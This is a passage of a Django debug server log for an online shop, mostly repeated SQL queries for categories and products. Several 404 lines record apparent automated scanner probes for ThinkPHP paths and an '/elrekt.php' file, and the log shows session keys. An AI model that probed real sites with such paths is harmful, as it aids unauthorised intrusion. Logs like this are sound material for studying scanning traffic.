"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 08:18:35,794 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 08:18:35,796 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 08:18:35,799 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 08:18:35,802 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 08:18:35,806 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 08:18:35,808 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 08:18:35,811 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 08:18:35,814 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 08:18:35,817 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 08:18:35,819 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 08:18:35,823 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 08:18:35,826 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 08:18:35,829 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 08:18:35,831 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 08:18:35,834 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 08:18:35,838 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 08:18:35,841 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 08:18:35,843 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 08:18:35,846 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 08:18:35,848 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 08:18:35,853 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 08:18:35,855 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 08:18:35,859 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 08:18:35,861 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 08:18:35,864 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 08:18:35,866 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 08:18:35,870 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 08:18:35,873 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 08:18:35,876 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 08:18:35,879 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 08:18:35,882 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 08:18:35] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 08:18:40,025 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 08:18:40,028 utils 4252 140031721535232 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 08:18:40] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 08:18:40] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 304 0 [18/Dec/2019 08:18:40] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 304 0 [18/Dec/2019 08:18:40] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 304 0 DEBUG 2019-12-18 08:19:15,596 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 08:19:15,602 utils 4252 140031721535232 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 08:19:15] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 08:20:10] "GET / HTTP/1.0" 302 0 [18/Dec/2019 08:25:13] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [18/Dec/2019 08:26:21] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [18/Dec/2019 08:26:25] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=179 HTTP/1.0" 404 6532 Not Found: /newslist.asp [18/Dec/2019 08:26:29] "GET /newslist.asp?type=4&id=1327 HTTP/1.0" 404 6476 [18/Dec/2019 08:32:38] "GET / HTTP/1.0" 302 0 [18/Dec/2019 08:35:22] "GET / HTTP/1.0" 302 0 [18/Dec/2019 08:37:41] "GET / HTTP/1.0" 302 0 [18/Dec/2019 08:42:44] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [18/Dec/2019 08:42:53] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [18/Dec/2019 08:42:54] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [18/Dec/2019 08:42:54] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [18/Dec/2019 08:42:55] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [18/Dec/2019 08:42:55] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [18/Dec/2019 08:42:56] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [18/Dec/2019 08:42:57] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [18/Dec/2019 08:42:57] "GET /index.php HTTP/1.0" 404 6447 [18/Dec/2019 08:42:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 08:42:59,263 utils 4252 140031721535232 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v3mkj8znzblr96pjbwir1pr03aeep17g' LIMIT 1; args=('v3mkj8znzblr96pjbwir1pr03aeep17g',) DEBUG 2019-12-18 08:42:59,265 utils 4252 140031721535232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v3mkj8znzblr96pjbwir1pr03aeep17g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-01T08:42:59.264448+00:00'::timestamptz); args=('v3mkj8znzblr96pjbwir1pr03aeep17g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 1, 8, 42, 59, 264448, tzinfo=)) [18/Dec/2019 08:42:59] "GET /login/?next=/ HTTP/1.0" 200 1786 [18/Dec/2019 08:50:31] "GET / HTTP/1.0" 302 0 [18/Dec/2019 08:56:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 09:03:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 09:03:37,187 utils 4252 140031721535232 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'h3lmnkp90t97nzyux8rfxmd28tmnkieh' LIMIT 1; args=('h3lmnkp90t97nzyux8rfxmd28tmnkieh',) DEBUG 2019-12-18 09:03:37,189 utils 4252 140031721535232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('h3lmnkp90t97nzyux8rfxmd28tmnkieh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-01T09:03:37.188504+00:00'::timestamptz); args=('h3lmnkp90t97nzyux8rfxmd28tmnkieh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 1, 9, 3, 37, 188504, tzinfo=)) [18/Dec/2019 09:03:37] "GET /login/?next=/ HTTP/1.0" 200 1786 [18/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 09:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 09:11:49,626 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:11:49,633 utils 4252 140031721535232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:11:49] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 09:13:53,965 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:13:53,971 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:13:53,975 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:13:53,978 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:13:53,981 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:13:53,983 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:13:53,986 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:13:53,988 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:13:53,990 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:13:53,993 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:13:53,996 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:13:53,998 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:13:54,000 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:13:54,002 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:13:54,006 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:13:54,008 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:13:54,010 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:13:54,012 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:13:54,014 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:13:54,018 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 